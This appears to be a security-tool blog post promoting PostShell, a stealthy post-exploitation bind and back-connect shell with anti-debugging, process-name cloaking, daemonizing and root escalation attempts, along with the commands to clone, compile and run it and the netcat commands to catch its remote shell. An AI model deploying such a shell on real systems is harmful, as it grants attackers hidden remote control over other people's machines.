PostShell – Post Exploitation Bind/Backconnect Shell

PostShell is a post-exploitation shell that includes both a bind and a back connect shell. It creates a fully interactive TTY which allows for job control. The stub size is around 14kb and can be compiled on any Unix like system.

ScreenShots

Banner and interaction with shell after a connection is started.

Also Read – Metame : Metamorphic Code Engine For Arbitrary Executables

Why not use a traditional Backconnect/Bind Shell?

PostShell allows for easier post-exploitation by making the attacker less dependant on dependencies such as Python and Perl.

It also incorporates both a back connect and bind shell, meaning that if a target doesn’t allow outgoing connections an operator can simply start a bind shell and connect to the machine remotely.

PostShell is also significantly less suspicious than a traditional shell due to the fact both the name of the processes and arguments are cloaked.

Features

  • Anti-Debugging, if ptrace is detected as being attached to the shell it will exit.
  • Process Name/Thread names are cloaked, a fake name overwrites all of the system arguments and file name to make it seem like a legitimate program.
  • TTY, a TTY is created which essentially allows for the same usage of the machine as if you were connected via SSH.
  • Bind/Backconnect shell, both a bind shell and back connect can be created.
  • Small Stub Size, a very small stub(<14kb) is usually generated.
  • Automatically Daemonizes
  • Tries to set GUID/UID to 0 (root)

Getting Started

Downloading: git clone https://github.com/rek7/postshell

Compiling: cd postshell && sh compile.sh This should create a binary called “stub” this is the malware.

Commands

$ ./stub
Bind Shell Usage: ./stub port
Back Connect Usage: ./stub ip port
$

Example Usage

Backconnect:

$ ./stub 127.0.0.1 13377

Bind Shell:

$ ./stub 13377

Recieving a Connection with Netcat

Recieving a backconnect:

$ nc -vlp port

Connecting to a bind Shell:

$ nc host port

R K

Recent Posts

ROADTools: The Modern Azure AD Exploration Framework

ROADTools is a powerful framework designed for exploring and interacting with Microsoft Azure Active Directory…

21 hours ago

How to Enumerate Microsoft 365 Groups Using PowerShell and Python

Microsoft 365 Groups (also known as M365 Groups or Unified Groups) are at the heart…

22 hours ago

SeamlessPass: Using Kerberos Tickets to Access Microsoft 365

SeamlessPass is a specialized tool designed to leverage on-premises Active Directory Kerberos tickets to obtain…

2 days ago

PPLBlade: Advanced Memory Dumping and Obfuscation Tool

PPLBlade is a powerful Protected Process Dumper designed to capture memory from target processes, hide…

2 days ago

HikPwn : Simple Scanner For Hikvision Devices With Basic Vulnerability Scanning

HikPwn: Comprehensive Guide to Scanning Hikvision Devices for Vulnerabilities If you’re searching for an efficient…

3 days ago

Comments in Bash Scripts

What Are Bash Comments? Comments in Bash scripts, are notes in your code that the…

1 week ago